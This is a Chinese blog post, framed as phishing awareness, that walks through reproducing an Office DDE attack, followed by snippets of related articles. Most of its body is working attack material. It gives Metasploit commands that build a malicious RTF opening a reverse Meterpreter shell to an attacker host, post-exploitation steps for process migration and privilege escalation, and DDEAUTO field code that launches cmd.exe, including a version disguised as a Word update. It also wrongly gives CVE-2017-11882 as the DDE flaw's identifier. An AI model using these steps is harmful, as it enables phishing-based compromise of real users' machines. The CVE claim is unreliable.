谨防钓鱼——OFFICE DDE复现

最新推荐文章于 2022-10-11 15:47:31 发布
最新推荐文章于 2022-10-11 15:47:31 发布
阅读量513 收藏 1
点赞数
分类专栏: web渗透测试心得
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tempulcc/article/details/108471488
版权

OFFICE DDE,这是微软的 OFFICE中的一个功能,能过够执行公式,插入远程图片,也可以用来执行恶意代码,即有了OFFICE DDE漏洞,cve编号:CVE-2017-11882,刚开始漏洞被发现的时候,微软并没有认为是漏洞,认为这是OFFICE软件的正常功能。

正好今天学习metasploit,拿这个漏洞练练手

msfconsole
search office-dde  
use exploit/windows/fileformat/office_dde_delivery
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.78.128
run

在这里插入图片描述
拷贝payload文件msf.rtf到目标机器,现实中发邮件的攻击最常见。
在目标机器上运行msf.rtf
在这里插入图片描述
获取meterpreter
getpid 查询当前进程id
migrate 3328 注入进程,注入至explorer.exe进程中
kill 如果原来的进程没有停止,执行kill命令
getsystem 提权


手工测试dde也很简单
新建word文档,ctrl+F9,插入以下的测试代码

DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

或者插入-文档部件-域,选择第一个= (Formula) 然后右键切换域代码来编辑代码,插入上面的内容

在这里插入图片描述

稍微伪装以下:看起来像是word要更新
在这里插入图片描述
伪装的代码:

DDEAUTO C:\\Programs\\Office\\Updates\\WINWORD.exe/../../../../Windows\\System32\\cmd.exe "WinWord Update                         /k calc.exe"

更多测试代码可以参考《Office DDE漏洞学习笔记》

tempulcc
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
鱼叉钓鱼:利用 Office 文档进行 DDE 攻击
weixin_45575473的博客
04-20 567
鱼叉钓鱼:利用 Office 文档进行 DDE 攻击 DDE DDE 是一个自定义字段,用户可插入文档。这些字段允许用户输入简单的说明,包括插入到新文档中的数据及插入位置。攻击者可以创建包含DDE字段的恶意Word文件(而不需要打开另一个Office应用程序)、打开命令提示符和运行恶意代码。 通常情况下,Office应用程序会显示两项告警内容。第一个是关于包含指向其他文件的链接的文档告警,第二个是关于打开远程命令提示符的错误告警。 在MSWord和MSExcel里,我们可以使用DDE来执行命令。 DDE
红蓝对抗钓鱼篇之从入门到放弃
xnxqwzy的博客
09-13 165
上一章讲到邮件服务器的搭建和使用,那么这章就具体讲解利用方式。在大型企业边界安全做的越来越好的情况下,不管是 APT 攻击还是红蓝对抗演练,钓鱼和水坑攻击被越来越多的应用。钓鱼往往需要免杀技术的支撑,但本章只讲述钓鱼和些许免杀技术,免杀系列学习在后续讲解。
渗透测试工程师面试题大全(一)
热门推荐
w1304099880的博客
04-21 1万+
渗透测试工程师面试题大全(一) from:backlion大佬 整理 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息:whois、网站源 IP、旁站、C 段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说… 2.mysql 的网站注入,5.0 以上和 5.0 以下有什么区别? 5.0 以下没有 information_schema 这个系统表,无法列表...
使用Office进行DDE攻击
Sven的忘却日记
06-13 1976
当你打开恶意docx文件时,会有提示信息,不过通过解析路径的手段,把可疑部分隐藏了。 这个提示信息,看起来是启动我Word安装目录下的一个程序,普通人觉得,Word启动它自己目录下的程序,应该很正常呀!于是就点了是 此时用procexp查看进程列表,恶意的代码已经执行了~ 如果用7z来打开这个docx文件,可以看到里面的footer.xml文件中包含的恶意部分 DDEAUTO "C:\\P...
Office DDE漏洞临时解决方案
Tide的小家
12-18 809
紧急修方案
通达信指标——神奇DDE(主图).doc
07-30
通达信指标——神奇DDE(主图) 本篇文章将详细介绍通达信指标——神奇DDE(主图),该指标是一种基于技术分析的股票市场分析工具。通过对指标的解读,可以帮助投资者更好地了解股票市场的走势和趋势。 VAR1:移动...
ms office DDE攻击与防御
09-17
动态数据交换(DDE),它是在Microsoft Windows操作系统中实的客户端/服务器通信方法,自1987年早期的Windows 2.0基于Windows Messaging,并使用其功能来启动双方之间的连接,服务器侦听某些主题和消息,对其进行...
C语言头文件 DDE.H
06-11
C语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 ...
DDE通讯开发包
12-10
DDE(Dynamic Data Exchange)是微软在早期Windows操作系统中提供的一种进程间通信(IPC)机制,允许应用程序之间共享数据和命令。在这个“DDE通讯开发包”中,包含了一个名为NDde的DLL文件,它提供了对DDE协议的...
vbDDEServer_DDE服务器_visualbasic_
09-30
在VB(Visual Basic)编程环境中,DDE(Dynamic Data Exchange)是一种早期的进程间通信(IPC)技术,允许应用程序之间交换数据和控制信息。在这个"vbDDEServer_DDE服务器_visualbasic_"的压缩包中,包含的是一个DDE...
Office DDE 攻击
10-24 214
Authors: Etienne Stalmans, Saif El-Sherei What if we told you that there is a way to get command execution on MSWord without any Macros, or memory corruption?! Windows provides several methods ...
使用DDE来操作Word
ljmwork的专栏
07-03 2805
使用DDE来操作Word Windows支持三种基本的IPC(进程间通信)机制:动态链接库(DLL)中的共享数据段、Windows剪贴版(Clipboard)和动态数据交换DDE(Dynamic         Data Exchange)。许多著名的Windows应用程序如Microsoft         Word等都宣布支持DDE技术,并在程序中嵌入了D
完善MS官网上DDE的例子
piaopiaolanghua的专栏
08-11 4168
本文介绍了如何在 Visual C++ 中使用动态数据交换 (DDE),与 Excel 和 Word 进行通信。 注意: 如果可能,建议使用自动化,不 DDE,与 Excel 或 Word 进行通信。Excel 和 Word 具有丰富的对象模型提供了通过使用 DDE 不可用的自动化功能。5.0 及更高版本的 Excel 版本和版本 7.0 及更高版本的 Word 支持自动化。 回到顶端
pb 如何导出csv_DDE注入(CSV)漏洞原理及实战案例全汇总
weixin_39932838的博客
11-20 785
在渗透中遇到导出功能时,会如何进行测试?任意文件下载?或者越权查看?很多人很容易忽略的是DDE注入:导出格式为csv,xls时,或许你可以尝试构造这个漏洞,它不会对网站本身产生危害,但会对终端用户造成任意OS命令执行等危害。1、漏洞原理:1)Excel解析机制第一个需要知道的知识点是,在Excel任何以'='字符开头的单元格都将被电子表格软件解释为公式,如果我们在其中输入“=2+5”,则...
关于word中的DDE如何查看
qq_45844442的博客
10-11 395
在word当中可以内置一些代码,而这些代码有个专业名词叫做域代码,一般情况下这个代码是被隐藏了,需要在。其中里面有会置入大量数字,其实都是ASCII码,如图所示。勾选上即可看见(我使用的是WPS)
利用PowerShell Empire实Word文档DDE攻击控制(简单没啥用)
墨痕诉清风的博客
04-09 462
近期,有安全人员发了一种DynamicData Exchange (DDE)协议绕过MSWord和MSExcel宏限制,不需使用MSWord和MSExcel漏洞,就能实Office文档中执行恶意命令目的。在这篇文章中,我将展示如何利用基于Empire的PowerShell来对Word文档进行“伪装”攻击,可能还有其它实方法,我仅作个抛砖引玉。 创建Empire Listener 创建一个Empire Listener监听线程,可点此查看Empire的使用说明。 当监听线程启动运行之后,运行
利用木马对windows进行渗透
xiaopan233的博客
09-23 2300
本实验在虚拟机环境下进行!!! 准备: Kali            ip: 192.168.0.107 Win7带office2010           ip:192.168.0.108   我们先启动msfconsole并使用模块 use exploit/windows/fileformat/office_word_hta 查看目标 show targets 可以看到目标...
Office DDE漏洞学习笔记
weixin_30315435的博客
03-11 382
1、前言 2017年下半年爆发出来的Office漏洞,一直没有空做笔记记录。在病毒分析中也看到有利用这个漏洞的样本,针对Office系列软件发起的钓鱼攻击和APT攻击一直是安全攻防的热点。 2、office DDE Microsoft Office Word 的一个执行任意代码的方法,可以在不启用宏的情况下执行任意程序。 这个功能的本意是为了更方便地在 word 里同步更新其它应用的内容...
Dynamic Data Exchange(DDE)机制引发的卡死
阿草
03-21 2309
有一个bug:在XP系统下,某些机器上ShellExecute在打开文件时会造成程序卡死,看了Dump文件,堆栈如下: 说明ShellExecute内部使用了DDE,即Dynamic Data Exchange,动态数据交换技术。 DDE用于进程间通讯,需要两个Windows应用程序,其中一个作为服务器处理信息,另外一个作为客户机从服务器获得信息。客户机应用程序向当前所激活的服务器应用
dde matlab
最新发布
02-27
DDE (Dynamic Data Exchange) 是一种用于在不同应用程序之间进行数据交换的通信协议。而 MATLAB 是一强大的数值计算和科学程软件,它提供了丰富的数学函数库和工具箱,用于解决各种数学和工程问题。 在 MATLAB 中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值